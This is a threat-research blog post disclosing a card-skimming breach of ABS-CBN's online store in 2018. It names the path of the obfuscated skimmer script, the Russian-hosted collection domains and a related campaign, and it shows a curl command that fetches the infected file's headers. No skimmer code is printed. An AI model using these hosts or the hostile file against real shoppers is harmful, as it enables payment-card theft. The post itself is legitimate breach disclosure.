ABS-CBN next in series of high profile breaches
by Sansec Forensics Team
Published in Threat Research − September 18, 2018
ABS-CBN headquarters
While Filipinos are recovering from typhoon Mangkhut, another misfortune awaits them online. We found their broadcasting giant ABS-CBN − a $740 million conglomerate & top-500 global Internet destination − to be hacked. Criminals are running a payment skimmer on ABS-CBNs online store since at least August 16th. Personal information and credit cards are intercepted while people shop for merchandise for one of the 90+ television shows. The stolen data is sent onwards to a server registered in Irkutsk, Russia. The credit cards and identities are then (presumably) sold on the black market.
ABS-CBN is the latest target in a series of high profile skimming operations. Previously, British Airways and Ticketmaster admitted massive credit card theft of their customers. The methodology found at these crime scenes is the same: browser-based interception during the checkout process. This method is quickly gaining popularity because it defeats the security of encrypted connections (https/SSL).
Filipinos are recommended to carefully check their credit card statements for unauthorized payments.
We have notified ABS-CBN of the breach, but have not received a response.
Technical details
Sansec discovered the fraud campaign with newly released malware detection heuristics. The (obfuscated) malware is located at store.abs-cbn.com/js/lib/ccard.js (archive.org). This specific file has not been modified since four weeks, suggesting the malware was injected on or before August 16th.
$ curl -v https://store.abs-cbn.com/js/lib/ccard.js
< Last-Modified: Thu, 16 Aug 2018 06:24:34 GMT
The malware sends its stolen data to a payment collection server called adaptivecss.org.
This server is on the same Russian network as coffemokko.com, a different malware campaign that we discovered earlier this week:
Just discovered the curiously named "Coffe&Tea" malware campaign. CC servers at https://t.co/pS6O7mXCbm, https://t.co/7i8JqZcNXf, https://t.co/yCiImbSyfY. They have open dirs so you can list the fake payment popups per victim. Do you recognize any of them? pic.twitter.com/TFIr4qrHjm
— Willem de Groot (@gwillem) September 13, 2018
Read more
In this article
Easy CSP for your store?
Try Sansec Watch! Free, simple and fully integrated. Get PCI compliant alerting with minimal effort.
Sansec WatchScan your store now
for malware & vulnerabilities
eComscan is the most thorough security scanner for Magento, Adobe Commerce, Shopware, WooCommerce and many more.
Learn more
